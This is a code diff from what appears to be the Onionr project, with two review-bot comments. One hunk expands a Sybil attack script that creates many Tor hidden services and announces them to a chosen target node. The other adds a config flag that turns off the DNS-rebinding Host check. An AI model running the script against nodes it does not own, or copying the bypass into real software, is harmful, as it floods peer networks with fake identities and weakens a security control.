diff --git a/scripts/sybil-attack.py b/scripts/sybil-attack.py
index a81af097..0914f311 100644
--- a/scripts/sybil-attack.py
+++ b/scripts/sybil-attack.py
@@ -15,12 +15,26 @@ onionr_port = int(input("Enter onionr public api port: "))
 controller = Controller.from_port('127.0.0.1', int(input("Enter tor controller port: ")))
 controller.authenticate()
-for i in range(10):
- response = controller.create_ephemeral_hidden_service({80: f'{onionr_ip}:{onionr_port}'}, await_publication=True)
- print(response.service_id)
-
-
-node = input("Enter node to attack. Note that you legally must use your own, and even that might lead to technical or legal issues")
+node = input("Enter node to attack. Note that you legally must use your own, and even that might lead to technical or legal issues: ")
 assert stringvalidators.validate_transport(node)
+socks = input("Socks:")
+
+adders = set([])
+for i in range(int(input("Sybil addresses: "))):
+ response = controller.create_ephemeral_hidden_service({80: f'{onionr_ip}:{onionr_port}'}, await_publication=True)
+ #print(i, response.service_id)
+ adders.add(response.service_id)
+
+
+for x in adders:
+ x += '.onion'
+ print(f"Introducing {x} to {node}")
+ basicrequests.do_post_request(
+ f'http://{node}/announce',
+ data = {'node': x},
+ port=socks)
+
+
+
diff --git a/src/httpapi/security/public.py b/src/httpapi/security/public.py
index eaddf029..aa63bba7 100644
--- a/src/httpapi/security/public.py
+++ b/src/httpapi/security/public.py
@@ -40,7 +40,9 @@ class PublicAPISecurity:
 if request.host not in transports:
 # Abort conn if wrong HTTP hostname, to prevent DNS rebinding
- abort(403)
+ if not public_api.config.get(
+ 'general.allow_public_api_dns_rebinding', False):
+ abort(403)
 public_api.hitCount += 1 # raise hit count for valid requests
 try:
 if 'onionr' in request.headers['User-Agent'].lower():
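Review bot: The only check on the target is `assert stringvalidators.validate_transport(node)`, on the context line just above the added `socks` prompt, and asserts are stripped under `python -O`, so the validation can silently disappear. An explicit `if not stringvalidators.validate_transport(node): raise SystemExit("invalid transport address")` keeps the check in every run mode. The prompt states that the target must be the operator's own node, but nothing visible in the hunk confirms that before the announce loop runs, so a typed confirmation of the target at that point would be a reasonable guard for a test script like this. `socks` is also handed to `do_post_request` as the raw input string, where the other port prompts are wrapped in `int(...)`.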
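Review bot: When `general.allow_public_api_dns_rebinding` is set, a request whose Host is not in `transports` now falls through to `public_api.hitCount += 1` and the rest of the handler, so the flag removes the Host check entirely while the comment above it still reads as if the abort were unconditional. I would reword the comment to something like `# Abort on wrong HTTP hostname to prevent DNS rebinding; skipped only when general.allow_public_api_dns_rebinding is set (testing only)`, and log a warning each time the bypass path is taken so an accidentally enabled flag is visible in the node's logs. The hit counter's own comment says it counts valid requests, which no longer holds for bypassed ones. Whether the new key is documented in the default config with a `False` default cannot be seen from this hunk, and the enclosing function starts and ends outside it.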